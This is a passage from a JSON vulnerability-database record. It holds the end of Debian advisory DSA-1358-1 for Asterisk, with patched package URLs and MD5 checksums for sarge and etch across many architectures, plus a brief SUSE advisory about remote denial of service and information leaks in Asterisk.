http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge5_powerpc.deb\n Size/MD5 checksum: 21970 83d4645426d80b755fac8e0a722a049b\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge5_s390.deb\n Size/MD5 checksum: 1313194 883d197378cb2499dbea7b36f9f71015\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge5_s390.deb\n Size/MD5 checksum: 31384 dff2953d4456c1b4f6369f2e80935dd1\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge5_s390.deb\n Size/MD5 checksum: 21972 2c0deaf9b334082ad5f388e964f74295\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge5_sparc.deb\n Size/MD5 checksum: 1274948 1edf4c192e12a07d9f634701997b9401\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge5_sparc.deb\n Size/MD5 checksum: 30342 c43e227874341d532402f62b662ec045\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge5_sparc.deb\n Size/MD5 checksum: 21976 1b0665679c70823fceafacedc84c33dd\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg-2etch1.dsc\n Size/MD5 checksum: 1488 97a08cc08f7a14f50af5583f6cfaae89\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg-2etch1.diff.gz\n Size/MD5 checksum: 178578 b99340fd02758c851c28ae1e3c955d42\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg.orig.tar.gz\n Size/MD5 checksum: 3835589 f8ee088b2e4feffe2b35d78079f90b69\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-config_1.2.13~dfsg-2etch1_all.deb\n Size/MD5 checksum: 131626 53dd0cd1001f4e78b2b2016773d60e5c\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dev_1.2.13~dfsg-2etch1_all.deb\n Size/MD5 checksum: 169902 3f0386aaaad741f88b25ec997e7af8dd\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-doc_1.2.13~dfsg-2etch1_all.deb\n Size/MD5 checksum: 1499930 23be47715b380082a03a35d8805a6211\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-sounds-main_1.2.13~dfsg-2etch1_all.deb\n Size/MD5 checksum: 1504542 e4ad12dc4a65fd9eaf8a58efc4def422\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-web-vmail_1.2.13~dfsg-2etch1_all.deb\n Size/MD5 checksum: 73698 6feb2b37089d8f828130cc21c8e79625\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg-2etch1_all.deb\n Size/MD5 checksum: 146440 d90b1991d6afd624e9f31668ef018587\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch1_alpha.deb\n Size/MD5 checksum: 1934132 b322a206b3248e18a4ada8ecd87b7ded\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch1_alpha.deb\n Size/MD5 checksum: 1897492 fa7a0e4791176049a7110b949384521d\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch1_alpha.deb\n Size/MD5 checksum: 136926 41f35290480070e4831521847de74107\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch1_amd64.deb\n Size/MD5 checksum: 1752012 6541f884fe3fe9f48b4acc63cf693349\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch1_amd64.deb\n Size/MD5 checksum: 1716992 cdf6e4ba213e5cfa3066f22f395ce98f\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch1_amd64.deb\n Size/MD5 checksum: 133196 f8e1c9b4a8ab373f8bcba2aa000df651\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch1_arm.deb\n Size/MD5 checksum: 1700720 e0397a0396919650c8a6d5368aaf2334\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch1_arm.deb\n Size/MD5 checksum: 1667510 6457678cf86c159d8238cd3845fa19e5\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch1_arm.deb\n Size/MD5 checksum: 136300 b1db97740d639312a9fe81d1f1203aeb\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch1_hppa.deb\n Size/MD5 checksum: 1869060 7af81a120af617d6f8bd4a811ba81209\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch1_hppa.deb\n Size/MD5 checksum: 1830320 ad3ca0f6130dd1730092e4a1ecd16300\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch1_hppa.deb\n Size/MD5 checksum: 145084 68b9a07789c2f631d799e880a3b5760d\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch1_i386.deb\n Size/MD5 checksum: 1648860 a4e6285b3a8859f93a52121468429ad3\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch1_i386.deb\n Size/MD5 checksum: 1615580 f70eb637297095022cdbd859bddd8376\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch1_i386.deb\n Size/MD5 checksum: 130820 76b1d7e76d2baae5857aa56a09e87652\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch1_ia64.deb\n Size/MD5 checksum: 2394412 5ebec711b6e457c53f1193232bc4d3d8\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch1_ia64.deb\n Size/MD5 checksum: 2348026 759e196b5702b5213387f21924541725\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch1_ia64.deb\n Size/MD5 checksum: 149578 b288f2afa9155e69faff7823181abcab\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch1_mips.deb\n Size/MD5 checksum: 1694260 c563cc857259855924323b1cb3ba1a00\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch1_mips.deb\n Size/MD5 checksum: 1661664 8e47a70c83a8bbdb11f0dce83c2fe955\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch1_mips.deb\n Size/MD5 checksum: 129886 52285a9197ecd9269b42024650717d9c\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch1_powerpc.deb\n Size/MD5 checksum: 1862936 52427bfe7b0189a99a983774c0a4b6d8\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch1_powerpc.deb\n Size/MD5 checksum: 1824632 88d7faa382d4918e0e667fff2863e623\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch1_powerpc.deb\n Size/MD5 checksum: 132946 f9a538e42c44d4ee7390e95bf53fa4d8\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch1_s390.deb\n Size/MD5 checksum: 1779980 75bbc48a8e0184278173a4edbab1bd5d\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch1_s390.deb\n Size/MD5 checksum: 1743918 910d6863b1af755d619ff991b2f2163b\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch1_s390.deb\n Size/MD5 checksum: 136414 7d0eb7a034f10319aa7fb538cc8fe5b2\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch1_sparc.deb\n Size/MD5 checksum: 1663536 cf93228c0e4142e626087f2c5b3722b3\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch1_sparc.deb\n Size/MD5 checksum: 1631434 1d7acccfd9cfbcbd1ac1ee515487b3df\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch1_sparc.deb\n Size/MD5 checksum: 132076 a99f330580f855205796726963251506\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2007-08-26T00:00:00", "published": "2007-08-26T00:00:00", "id": "DEBIAN:DSA-1358-1:2659E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00120.html", "title": "[SECURITY] [DSA 1358-1] New asterisk packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:40:21", "bulletinFamily": "unix", "description": "The Open Source PBX software Asterisk was updated to fix several security related bugs that allowed attackers to remotely crash asterisk or cause information leaks:\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2007-06-06T17:11:13", "published": "2007-06-06T17:11:13", "id": "SUSE-SA:2007:034", "href": "http://lists.opensuse.org/opensuse-security-announce/2007-06/msg00000.html", "type": "suse", "title": "remote denial of service in asterisk", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}